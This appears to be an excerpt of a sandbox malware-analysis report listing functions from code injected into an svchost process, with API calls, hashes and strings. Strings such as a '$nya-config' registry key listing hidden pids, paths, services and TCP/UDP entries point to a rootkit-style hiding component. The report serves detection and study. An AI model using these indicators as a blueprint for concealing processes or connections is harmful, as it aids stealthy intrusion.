API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 3929e908c5efdb50802740529e7f9fb41309619d651063b853838cf7facbc3eb
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: E1319C5DE00665A1FB98BFE7D76936B23B4A744BC0F0458319F0987797DE98C4B0C214

Non-executed Functions

Function 0000022F4B922FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022F4B923094
lstrlenW.KERNEL32 ref: 0000022F4B9232BE

Part of subcall function 0000022F4B921A30: OpenProcess.KERNEL32 ref: 0000022F4B921A56
Part of subcall function 0000022F4B921A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022F4B921A74
Part of subcall function 0000022F4B921A30: PathFindFileNameW.SHLWAPI ref: 0000022F4B921A83
Part of subcall function 0000022F4B921A30: lstrlenW.KERNEL32 ref: 0000022F4B921A8F
Part of subcall function 0000022F4B921A30: StrCpyW.SHLWAPI ref: 0000022F4B921AA2
Part of subcall function 0000022F4B921A30: CloseHandle.KERNEL32 ref: 0000022F4B921AB0

GetProcAddress.KERNEL32 ref: 0000022F4B9230A9

Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0

StrCmpNIW.SHLWAPI ref: 0000022F4B9230EC
lstrlenW.KERNEL32 ref: 0000022F4B923214

Strings

\Device\Nsi, xrefs: 0000022F4B9230DF
ntdll.dll, xrefs: 0000022F4B92308D
NtQueryObject, xrefs: 0000022F4B92309F

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 147cdcf82202d8e0471ff3581cefa6d14657757d9480307097532bc8ead48c1b
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: E0B1D429E14690AAFB9CAFA5D62835B63B4F744B84F405436DF0953796DFB8CD40C341

Function 0000022F4B9284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000022F4B9284CC
RtlCaptureContext.NTDLL ref: 0000022F4B9284F9
RtlLookupFunctionEntry.NTDLL ref: 0000022F4B928513
RtlVirtualUnwind.NTDLL ref: 0000022F4B928554
IsDebuggerPresent.KERNEL32 ref: 0000022F4B9285A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022F4B9285C5
UnhandledExceptionFilter.KERNEL32 ref: 0000022F4B9285D0

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 5eede67ed12d608bc06b41e83df98e201cc61c4a372c92de6e6655074c48d11c
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 1D318176A04B8096EBA4AFA0E8A43DE7370F788744F44443ADB4D47B99EFB8C548C710

Function 0000022F4B92CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000022F4B92CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000022F4B92CE23
RtlVirtualUnwind.NTDLL ref: 0000022F4B92CE5E
IsDebuggerPresent.KERNEL32 ref: 0000022F4B92CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022F4B92CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000022F4B92CEAC

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: b9e4fb152665ba47da9891cea323b39acc5666c2d8f9b080be451602521d2c89
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 8F41BB3AA04B80A6EBA0DF64E89439F73B0F788754F500535EB8D46B9ADFB8C555CB00

Function 0000022F4B92DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000022F4B92DB99
FindNextFileW.KERNEL32 ref: 0000022F4B92DCCF
FindClose.KERNEL32 ref: 0000022F4B92DD0F
FindClose.KERNEL32 ref: 0000022F4B92DD3B

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: c7a4973126e1821149b9bb57efd12384a65569e6dc40a33e3ade57d1bdd71235
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 73A1F72AF0468069FBA4EFB5D6683AF6BB0AB45794F184535DF4427BD6CABCC041E700

Function 0000022F4B921724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000022F4B92172F
HeapAlloc.KERNEL32 ref: 0000022F4B92173E

Part of subcall function 0000022F4B921264: GetProcessHeap.KERNEL32 ref: 0000022F4B92126A
Part of subcall function 0000022F4B921264: HeapAlloc.KERNEL32 ref: 0000022F4B921279
Part of subcall function 0000022F4B921264: GetProcessHeap.KERNEL32 ref: 0000022F4B921293
Part of subcall function 0000022F4B921264: HeapAlloc.KERNEL32 ref: 0000022F4B9212A4

Part of subcall function 0000022F4B921000: GetProcessHeap.KERNEL32 ref: 0000022F4B921006
Part of subcall function 0000022F4B921000: HeapAlloc.KERNEL32 ref: 0000022F4B921015
Part of subcall function 0000022F4B921000: GetProcessHeap.KERNEL32 ref: 0000022F4B921028
Part of subcall function 0000022F4B921000: HeapAlloc.KERNEL32 ref: 0000022F4B921037

RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217AE
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217DB
RegCloseKey.ADVAPI32 ref: 0000022F4B9217F5
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921815
RegCloseKey.ADVAPI32 ref: 0000022F4B921830
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921850
RegCloseKey.ADVAPI32 ref: 0000022F4B92186B
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92188B
RegCloseKey.ADVAPI32 ref: 0000022F4B9218A6
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9218C6
RegCloseKey.ADVAPI32 ref: 0000022F4B9218E1
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921901
RegCloseKey.ADVAPI32 ref: 0000022F4B92191C
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92193C
RegCloseKey.ADVAPI32 ref: 0000022F4B921957
RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921977
RegCloseKey.ADVAPI32 ref: 0000022F4B921992
RegCloseKey.ADVAPI32 ref: 0000022F4B92199C

Part of subcall function 0000022F4B9212B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022F4B921315
Part of subcall function 0000022F4B9212B8: GetProcessHeap.KERNEL32 ref: 0000022F4B921323
Part of subcall function 0000022F4B9212B8: HeapAlloc.KERNEL32 ref: 0000022F4B921334
Part of subcall function 0000022F4B9212B8: RegEnumValueW.ADVAPI32 ref: 0000022F4B921393
Part of subcall function 0000022F4B9212B8: GetProcessHeap.KERNEL32 ref: 0000022F4B9213DB
Part of subcall function 0000022F4B9212B8: HeapAlloc.KERNEL32 ref: 0000022F4B9213E9
Part of subcall function 0000022F4B9212B8: GetProcessHeap.KERNEL32 ref: 0000022F4B921406
Part of subcall function 0000022F4B9212B8: HeapFree.KERNEL32 ref: 0000022F4B921414
Part of subcall function 0000022F4B9212B8: lstrlenW.KERNEL32 ref: 0000022F4B92141D
Part of subcall function 0000022F4B9212B8: GetProcessHeap.KERNEL32 ref: 0000022F4B92142B
Part of subcall function 0000022F4B9212B8: HeapAlloc.KERNEL32 ref: 0000022F4B921439

Strings

startup, xrefs: 0000022F4B9217D1
pid, xrefs: 0000022F4B92180E
SOFTWARE\$nya-config, xrefs: 0000022F4B92178E
process_names, xrefs: 0000022F4B921849
tcp_local, xrefs: 0000022F4B9218FA
tcp_remote, xrefs: 0000022F4B921935
paths, xrefs: 0000022F4B921884
service_names, xrefs: 0000022F4B9218BF
udp, xrefs: 0000022F4B921970

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 166e6a7cf8ca6ae22d1d2167cc4d7dbb97e4619db1cdf95cc15371901a208e22
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 0F71302AB10E50A6EB90AFE5E9A865A2374FB49B88F402531DF4D4372ADF79C464C340

Function 0000022F4B9212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022F4B921315
GetProcessHeap.KERNEL32 ref: 0000022F4B921323
HeapAlloc.KERNEL32 ref: 0000022F4B921334
RegEnumValueW.ADVAPI32 ref: 0000022F4B921393

Part of subcall function 0000022F4B921530: StrCmpIW.SHLWAPI ref: 0000022F4B921561

GetProcessHeap.KERNEL32 ref: 0000022F4B9213DB
HeapAlloc.KERNEL32 ref: 0000022F4B9213E9
GetProcessHeap.KERNEL32 ref: 0000022F4B921406
HeapFree.KERNEL32 ref: 0000022F4B921414
lstrlenW.KERNEL32 ref: 0000022F4B92141D
GetProcessHeap.KERNEL32 ref: 0000022F4B92142B
HeapAlloc.KERNEL32 ref: 0000022F4B921439
StrCpyW.SHLWAPI ref: 0000022F4B92145B
GetProcessHeap.KERNEL32 ref: 0000022F4B921472
HeapFree.KERNEL32 ref: 0000022F4B921480

Strings

d, xrefs: 0000022F4B921356

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 5fd594a0b7fa2e6d6a870a4b8be9315c5f609ef8c5858b0e1febb8391929093b
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 99515A36A00B84A6EBA4EFA2E66835A77B1F78CB88F448134DB4947719DF7CC459C700

Function 0000022F4B92EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000022F4B92F34A,?,?,00000000,0000022F4B92F2CD), ref: 0000022F4B92EFF5
GetLastError.KERNEL32(?,?,00000000,0000022F4B92F2CD), ref: 0000022F4B92F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000022F4B92F2CD), ref: 0000022F4B92F049
VirtualProtect.KERNEL32 ref: 0000022F4B92F0A5
VirtualProtect.KERNEL32 ref: 0000022F4B92F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000022F4B92F2CD), ref: 0000022F4B92F11A
GetProcAddress.KERNEL32(?,?,00000000,0000022F4B92F2CD), ref: 0000022F4B92F126

Strings

ext-ms-, xrefs: 0000022F4B92F02E
AppPolicyGetProcessTerminationMethod, xrefs: 0000022F4B92F157, 0000022F4B92F165
api-ms-, xrefs: 0000022F4B92F01B

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 667aa4a931bf1db41e538e731fbbbe72ea80eb3c72d69248ee73dd534c18d3f0
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 59519029F0160461FA98AF96EA687A73270AB49BB0F584B349F3D473D2DBBCC445C740

Function 0000022F4B9233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 0000022F4B9233FD
GetProcessHeap.KERNEL32 ref: 0000022F4B923412
HeapAlloc.KERNEL32 ref: 0000022F4B923420
PdhGetCounterInfoW.PDH ref: 0000022F4B923436
StrCmpW.SHLWAPI ref: 0000022F4B92344B

Part of subcall function 0000022F4B923950: StrCmpNW.SHLWAPI ref: 0000022F4B923972
Part of subcall function 0000022F4B923950: StrStrW.SHLWAPI ref: 0000022F4B923990
Part of subcall function 0000022F4B923950: StrToIntW.SHLWAPI ref: 0000022F4B9239B7

GetProcessHeap.KERNEL32 ref: 0000022F4B923488
HeapFree.KERNEL32 ref: 0000022F4B923496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000022F4B923444

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 54bb57bfbac15d22c730a9ae4bf4d5dcc13813a5c375ca13860c46240ad27539
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 6631B326E04A40AAFBA5EF92EA1835BA3B0F78CBC5F4445349F4943626DFBCC555C340

Function 0000022F4B9234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 0000022F4B923516
GetProcessHeap.KERNEL32 ref: 0000022F4B923527
HeapAlloc.KERNEL32 ref: 0000022F4B923535
PdhGetCounterInfoW.PDH ref: 0000022F4B92354B
StrCmpW.SHLWAPI ref: 0000022F4B923560

Part of subcall function 0000022F4B923950: StrCmpNW.SHLWAPI ref: 0000022F4B923972
Part of subcall function 0000022F4B923950: StrStrW.SHLWAPI ref: 0000022F4B923990
Part of subcall function 0000022F4B923950: StrToIntW.SHLWAPI ref: 0000022F4B9239B7

GetProcessHeap.KERNEL32 ref: 0000022F4B92358D
HeapFree.KERNEL32 ref: 0000022F4B92359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000022F4B923559

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 65eec3c7316b9ca877189915c2b978696c90943607defc846abed2c99c45d4dd
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: B6319129E14B01AAF794EF92EA68B1A63B0F788F84F0455359F4E43726DFB8C845C300

Function 0000022F4B92A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022F4B92A289

Part of subcall function 0000022F4B92B144: __GetUnwindTryBlock.LIBCMT ref: 0000022F4B92B187
Part of subcall function 0000022F4B92B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022F4B92B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022F4B92A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022F4B92A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022F4B92A6BC

Strings

csm, xrefs: 0000022F4B92A30A
csm, xrefs: 0000022F4B92A2A3
csm, xrefs: 0000022F4B92A384

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 83a760fde54ee1c5f207a7528977c86193a96b1b5316f8e0d94e5d4ef025fc8b
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 85D18D2AD007409AFBA8AFA5E65839E77B0F755798F100935DB8957797CB78C481C700

Function 0000022F4B8F962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022F4B8F9689

Part of subcall function 0000022F4B8FA544: __GetUnwindTryBlock.LIBCMT ref: 0000022F4B8FA587
Part of subcall function 0000022F4B8FA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022F4B8FA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022F4B8F9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022F4B8F99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022F4B8F9ABC

Strings

csm, xrefs: 0000022F4B8F970A
csm, xrefs: 0000022F4B8F96A3
csm, xrefs: 0000022F4B8F9784

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 350ed3b2226708ae4edfa82662d5c9b4d7a5033190cc26238961e0a1e2b44f09
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: AED1AF3AA00744A6EBA0EFA5D58879E77B0F755799F100135EF8957B9BEB74C082C700

Function 0000022F4B922518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000022F4B92252D
GetCurrentProcessId.KERNEL32 ref: 0000022F4B922537
CreateFileW.KERNEL32 ref: 0000022F4B922568
WriteFile.KERNEL32 ref: 0000022F4B922590
ReadFile.KERNEL32 ref: 0000022F4B9225AF
CloseHandle.KERNEL32 ref: 0000022F4B9225B8

Strings

\\.\pipe\$nya-childproc, xrefs: 0000022F4B922549

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 56fa6b07a625ae531577085f785817776d22235ed9cb5571334ba84ca8f443b3
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 2D116A3AA18B4092E7909F61F62831A7770F38DB94F945230EB9902AA9CFBDC144CB40

Function 0000022F4B927C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022F4B927C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000022F4B927CCA
_RTC_Initialize.LIBCMT ref: 0000022F4B927CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022F4B927D1E
__scrt_release_startup_lock.LIBCMT ref: 0000022F4B927D49

Memory Dump Source

